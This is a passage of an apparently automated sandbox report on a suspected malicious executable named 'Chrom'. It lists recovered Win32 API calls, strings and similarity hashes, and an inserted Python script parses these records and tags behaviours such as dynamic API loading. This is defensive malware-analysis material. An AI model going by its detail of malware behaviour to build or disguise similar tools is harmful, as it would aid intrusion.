                                                                                                                                                        • Instruction Fuzzy Hash: 3781AD716083029BDB10EF16D881A6F77E0AF89358F14092FF89497291D7B8DD45CB9A
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset
                                                                                                                                                        • String ID: BINARY
                                                                                                                                                        • API String ID: 2221118986-907554435
                                                                                                                                                        • Opcode ID: 60e0f8e27434ffc42e071fb85a3f10dba614baad71011669f295a7aba79e687e
                                                                                                                                                        • Instruction ID: 26b79014cfc78d58b95db9363976e6c90bc85ae6725c162ac4ac0b56dde6da67
                                                                                                                                                        • Opcode Fuzzy Hash: 60e0f8e27434ffc42e071fb85a3f10dba614baad71011669f295a7aba79e687e
                                                                                                                                                        • Instruction Fuzzy Hash: 4151AD71A043259FDB21CF28E581BAB7BE4AF08350F55446AF849DB342E778D980CBA5
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                                        • String ID: /stext
                                                                                                                                                        • API String ID: 2081463915-3817206916
                                                                                                                                                        • Opcode ID: faacc565551467a7f9fecfe8be6c9a25ffd216349f1a930335e294746595b54b
                                                                                                                                                        • Instruction ID: 2d0fa8a023af8a82833a79c8a9a2b375c4b98090195f1c385c961b9dc0378c10
                                                                                                                                                        • Opcode Fuzzy Hash: faacc565551467a7f9fecfe8be6c9a25ffd216349f1a930335e294746595b54b
                                                                                                                                                        • Instruction Fuzzy Hash: C0218830B00605AFD704EF66C981BDDF7B9FF94304F10016AA419E7342DBB9AD618B99
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00413E53
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
                                                                                                                                                          • Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
                                                                                                                                                          • Part of subcall function 004010A6: memset.MSVCRT ref: 004010D3
                                                                                                                                                          • Part of subcall function 004010A6: wcsrchr.MSVCRT ref: 004010EF
                                                                                                                                                          • Part of subcall function 004010A6: memset.MSVCRT ref: 0040110D
                                                                                                                                                          • Part of subcall function 004010A6: memset.MSVCRT ref: 004011AC
                                                                                                                                                          • Part of subcall function 004010A6: CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 004011C3
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                        • String ID: FA
                                                                                                                                                        • API String ID: 1828521557-1137249561
                                                                                                                                                        • Opcode ID: dbe4fe885372198836d1553c0ade92ba4046f6e660ffa4c2721431e6b8765f59
                                                                                                                                                        • Instruction ID: 1b9fe372a81af7ef4fcc301b0704f8a61b654f984bb2216e8f14dd72d3cafccc
                                                                                                                                                        • Opcode Fuzzy Hash: dbe4fe885372198836d1553c0ade92ba4046f6e660ffa4c2721431e6b8765f59
                                                                                                                                                        • Instruction Fuzzy Hash: CB11ACB194021D79EB20F761DC4AFDB776CDF50314F04047BB518A51C2E6B89AD44669
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94
                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040118B,?,?,?,?,000003FF), ref: 0040D0F2
                                                                                                                                                          • Part of subcall function 0040B5F5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040700C), ref: 0040B5FE
                                                                                                                                                          • Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5
                                                                                                                                                          • Part of subcall function 0040B170: MultiByteToWideChar.KERNEL32(0040D143,00000000,000000FF,?,00000000,00000000,?,00000000,?,0040D143,?,000000FF,0000FDE9), ref: 0040B189
                                                                                                                                                          • Part of subcall function 0040B170: MultiByteToWideChar.KERNEL32(0040D143,00000000,000000FF,?,00000000,00000000,?,0040D143,?,000000FF,0000FDE9), ref: 0040B1AE
                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040D146
                                                                                                                                                          • Part of subcall function 0040B671: ??3@YAXPAX@Z.MSVCRT(00000000,0040B5FD,00000000,0040700C), ref: 0040B678
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
• String ID:
• API String ID: 2445788494-0
• Opcode ID: b3434e175287108bd8d00d51b0c6cbae2b7fb7d9485ba0b8fd75dd7f0a2e64a6
• Instruction ID: 8c387e03d8c3aade5b41685a2e02256394b39ebaaf0903d076e01eb80a76af23
• Opcode Fuzzy Hash: b3434e175287108bd8d00d51b0c6cbae2b7fb7d9485ba0b8fd75dd7f0a2e64a6
• Instruction Fuzzy Hash: 99115635804208FEDB00AF69DC45C9A7FB4EF45364715C27AF914AB291D7349A09CBA9
APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 00417283
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
• Opcode ID: 48d3b0d99305b5713d050b9a7aed3c2df143f476be273c6a02e7235a5e54717b
• Instruction ID: 7af341f115bc0a609711c5f8cf1e2214d5d118070d6e99c1fc297229056b61f8
• Opcode Fuzzy Hash: 48d3b0d99305b5713d050b9a7aed3c2df143f476be273c6a02e7235a5e54717b
• Instruction Fuzzy Hash: AFE026B7F09B2263C200961AEC0568277F09FC132571A813BF95CD3280C638DC5B83AA
APIs
• memset.MSVCRT ref: 0041DD36
• memcmp.MSVCRT(0000006B,?,00000010,?,?,?,?,?,?,?,?,0042110C,00000007,?), ref: 0041DD48
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memcmpmemset
• String ID:
• API String ID: 1065087418-0
• Opcode ID: 1d55d7fb62e4bfc7d9f251faebd1bd6dd92cbbfd5fee9d1820b3c6a6745402c4
• Instruction ID: 94185df667f8708a14b2030ade84f1c931118ff06ce27a9f792afb950defdc79
• Opcode Fuzzy Hash: 1d55d7fb62e4bfc7d9f251faebd1bd6dd92cbbfd5fee9d1820b3c6a6745402c4
• Instruction Fuzzy Hash: CA616BF1E00205EBDB10EFA599C0AEEB7B4AF05308F14447BE50597241E779AEC4DB89
APIs
  • Part of subcall function 0040E814: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,0041079D,?), ref: 0040E835
  • Part of subcall function 0040E814: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,0041079D,?), ref: 0040E8FC
• GetStdHandle.KERNEL32(000000F5,?,004122A5,00000000,00000000,?,00000000,00000000,00000000), ref: 00410077
• CloseHandle.KERNELBASE(00000000,?,004122A5,00000000,00000000,?,00000000,00000000,00000000), ref: 0041019B
  • Part of subcall function 00409C9B: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,00410072,00000000,?,004122A5,00000000,00000000,?,00000000,00000000), ref: 00409CAD
  • Part of subcall function 00409CFB: GetLastError.KERNEL32(00000000,?,004101B0,00000000,?,004122A5,00000000,00000000,?,00000000,00000000,00000000), ref: 00409D0F
  • Part of subcall function 00409CFB: _snwprintf.MSVCRT ref: 00409D3C
  • Part of subcall function 00409CFB: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409D55
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
• String ID:
• API String ID: 1381354015-0
• Opcode ID: c352156c60bf5e8969b3410faff8cba1e1f857f4dc2c43362582496339407a16
• Instruction ID: 773294f2793927884dd3d35b59f4cb20d409429543e063566a68095ef13c6261
• Opcode Fuzzy Hash: c352156c60bf5e8969b3410faff8cba1e1f857f4dc2c43362582496339407a16
• Instruction Fuzzy Hash: 10417F31A00200FFCB219F69C885A9E77F6AF49714F21416FF446A7291CBBD9EC0DA59
APIs
• Sleep.KERNEL32(00000064), ref: 00419527
• CloseHandle.KERNELBASE(0CC483FF,00000000,00000000,0045EBC0,00419B7B,00000008,00000000,00000000,?,00419D38,?,00000000), ref: 00419530
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: CloseHandleSleep
• String ID:
• API String ID: 252777609-0
• Opcode ID: 1f38ef6d4e421f8b70049e49d582ab06bd968fb49a388c5a1d937bf22f5392b0
• Instruction ID: 10c3462ac1369c784e1afd36df35bd7f7ff6f222b97f55253c388b4ed129ec9c
• Opcode Fuzzy Hash: 1f38ef6d4e421f8b70049e49d582ab06bd968fb49a388c5a1d937bf22f5392b0
• Instruction Fuzzy Hash: 34E0C23B104216AEC6105BB9ECA099773DAEF9A2387544236F661E61A0C7759C828624
APIs
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 5e97efbfa32821b985a34f27a6b6b563597b1101e70238cb4ba8b6ea1fd80981
• Instruction ID: 5f0fdca9fe4acc2ecb8b3169f70f33f7bd062bec4b77ce871c218ba77f1467d2
• Opcode Fuzzy Hash: 5e97efbfa32821b985a34f27a6b6b563597b1101e70238cb4ba8b6ea1fd80981
• Instruction Fuzzy Hash: 16D048B0805B108ED7B0EF3AD801602BBF0EF08311320CE2EA0AAC2A60EB35A1049F04
APIs
  • Part of subcall function 00412DB7: memset.MSVCRT ref: 00412DF6
  • Part of subcall function 0040A5EB: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,00412D6B,00000000,?,00000000,?,00000000), ref: 0040A603
  • Part of subcall function 0040A5EB: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A617
  • Part of subcall function 0040A5EB: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00414002), ref: 0040A620
• CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 00412D75
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: File$Time$CloseCompareCreateHandlememset
• String ID:
• API String ID: 2154303073-0
• Opcode ID: 661eaf95a0eb430a0c353e7e574569b8050dd2ae37d277ca5a708745728aa288
• Instruction ID: da844e677e512885dbb2ef8f3ceebb0df353419e1ec893dedc4f3fc5669ae239
• Opcode Fuzzy Hash: 661eaf95a0eb430a0c353e7e574569b8050dd2ae37d277ca5a708745728aa288
• Instruction Fuzzy Hash: AE113072C00219ABCF01EBA5D9815DEB7B9EF84314F20046BE901F3240D6789F55CB95
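The per-function records in this section become useful once they are pulled out of the report and queried: which functions reach LoadLibraryW and GetProcAddress, which open a file for writing, which compare file times. The parser below is an added example written for this page; it is not Joe Sandbox code and not part of the report. It reads the record layout shown above (an "APIs" heading, call lines with an optional "Part of subcall function" prefix and a "ref:" call site, then "Similarity" fields). The three sample records are copied from the report with the indentation stripped, and the tags it assigns (dynamic API resolution, DLL load from the system directory, file-timestamp check, decoded CreateFileW access and disposition) are this example's own heuristics, not Joe Sandbox signatures.

```python
"""Parse the per-function records Joe Sandbox emits ('APIs' ... 'Similarity' blocks)
and tag each function by the Win32 APIs it reaches. Added example for this page,
not Joe Sandbox code; the tag rules are this example's own heuristics."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
# "• [Part of subcall function XXXXXXXX: ]Name.Module[(args)][, ref: XXXXXXXX]"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[^.(\s]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?\s*$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")  # "• API ID: ..." fields

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: Optional[str]          # call-site address
    subcall_of: Optional[str]   # callee address when the call is reached indirectly

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    similarity: Dict[str, str] = field(default_factory=dict)

    def api_names(self) -> List[str]:
        return [c.name for c in self.calls]

    def direct_refs(self) -> List[str]:
        """Call sites inside the function itself (not 'Part of subcall')."""
        return [c.ref for c in self.calls if c.ref and c.subcall_of is None]

def parse_records(text: str) -> List[FunctionRecord]:
    """One record per 'APIs' heading; lines before the first heading are a cut-off tail."""
    records: List[FunctionRecord] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADINGS:
            if line == "APIs":
                records.append(FunctionRecord())
            section = line
        elif records and section == "APIs" and (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            records[-1].calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif records and section == "Similarity" and (m := KV_RE.match(line)):
            records[-1].similarity[m["key"]] = m["val"]
    return records

GENERIC_READ, GENERIC_WRITE = 0x80000000, 0x40000000
DISPOSITION = {2: "CREATE_ALWAYS", 3: "OPEN_EXISTING"}  # the values that occur in this report

def describe_createfile(call: ApiCall) -> Optional[str]:
    """Decode dwDesiredAccess (2nd arg) and dwCreationDisposition (5th arg) of CreateFileW."""
    if call.name != "CreateFileW" or len(call.args) < 5:
        return None
    try:
        access, disp = int(call.args[1], 16), int(call.args[4], 16)
    except ValueError:                  # '?' = value not recovered by the sandbox
        return None
    modes = [n for bit, n in ((GENERIC_READ, "read"), (GENERIC_WRITE, "write")) if access & bit]
    return f"CreateFileW {'/'.join(modes) or 'no-generic-access'} {DISPOSITION.get(disp, hex(disp))}"

def tag_record(rec: FunctionRecord) -> List[str]:
    names, tags = set(rec.api_names()), []
    if names & {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExW"} and "GetProcAddress" in names:
        tags.append("dynamic-api-resolution")
    if "GetSystemDirectoryW" in names and names & {"LoadLibraryA", "LoadLibraryW"}:
        tags.append("loads-dll-from-system32")
    if names & {"GetFileTime", "CompareFileTime"}:
        tags.append("file-timestamp-check")
    if "MessageBoxW" in names:
        tags.append("user-visible-error")
    return tags + [d for d in map(describe_createfile, rec.calls) if d]

# Sample input: three records copied from the report, indentation stripped.
SAMPLE = r"""
APIs
• GetStdHandle.KERNEL32(000000F5,?,004122A5,00000000,00000000,?,00000000,00000000,00000000), ref: 00410077
• CloseHandle.KERNELBASE(00000000,?,004122A5,00000000,00000000,?,00000000,00000000,00000000), ref: 0041019B
  • Part of subcall function 00409C9B: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,00410072,00000000,?,004122A5,00000000,00000000,?,00000000,00000000), ref: 00409CAD
  • Part of subcall function 00409CFB: _snwprintf.MSVCRT ref: 00409D3C
  • Part of subcall function 00409CFB: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409D55
Similarity
• API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
• Instruction Fuzzy Hash: 10417F31A00200FFCB219F69C885A9E77F6AF49714F21416FF446A7291CBBD9EC0DA59
APIs
  • Part of subcall function 0040A5EB: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,00412D6B,00000000,?,00000000,?,00000000), ref: 0040A603
  • Part of subcall function 0040A5EB: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A617
• CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 00412D75
Similarity
• API ID: File$Time$CloseCompareCreateHandlememset
APIs
  • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
  • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
• GetProcAddress.KERNEL32(?,00000000), ref: 004160B2
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.direct_refs(), rec.api_names(), tag_record(rec))
```

The CreateFileW decoding relies on the argument order of the Win32 call: the second argument is dwDesiredAccess and the fifth is dwCreationDisposition, so 40000000 and 00000002 in the call at 00409CAD mean GENERIC_WRITE with CREATE_ALWAYS (the function creates or overwrites a file), while 80000000 and 00000003 at 0040A603 mean GENERIC_READ with OPEN_EXISTING, which together with GetFileTime and CompareFileTime is a timestamp comparison rather than a write. Arguments the sandbox could not recover appear as "?" and are skipped rather than guessed.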
APIs
  • Part of subcall function 00416068: FreeLibrary.KERNELBASE(?,0041608B,00000000,00413FA7,?,?,?,?,?,00403CF9,?), ref: 00416074
  • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
  • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
  • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
  • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
  • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
  • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
• GetProcAddress.KERNEL32(?,00000000), ref: 004160B2
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
APIs
• GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 0041645C
  • Part of subcall function 004162C5: memset.MSVCRT ref: 004162E4
  • Part of subcall function 004162C5: _itow.MSVCRT ref: 004162FB
  • Part of subcall function 004162C5: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0041630A
Yara matches
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
• String ID:
• API String ID: 4232544981-0
APIs
• SetFilePointerEx.KERNELBASE(00407AB8,?,?,00000000,00000000,00000000,00408135,00000000,00000000,?,00000000,00407AB8), ref: 00407AFE
  • Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5
Yara matches
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
APIs
• FreeLibrary.KERNELBASE(?,?,00413D28,?,?,?,00403D00,?), ref: 0041687D
Yara matches
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• FreeLibrary.KERNELBASE(00000000,0041421F,00000000,000001F7,00000000), ref: 0041577D
Yara matches
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,004100B1,00000000,00454884,00000002,?,004122A5,00000000,00000000,?), ref: 0040A8E4
Yara matches
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                        • Opcode ID: d7201b6ac2b644285d7a2778af57a6827c0a8e81cd3c62d8215e375c257f2314
                                                                                                                                                        • Instruction ID: cecd821801891233278d9e4f0cdd5aea3aed6bf5cf84d435cc8cf5239d0f839c
                                                                                                                                                        • Opcode Fuzzy Hash: d7201b6ac2b644285d7a2778af57a6827c0a8e81cd3c62d8215e375c257f2314
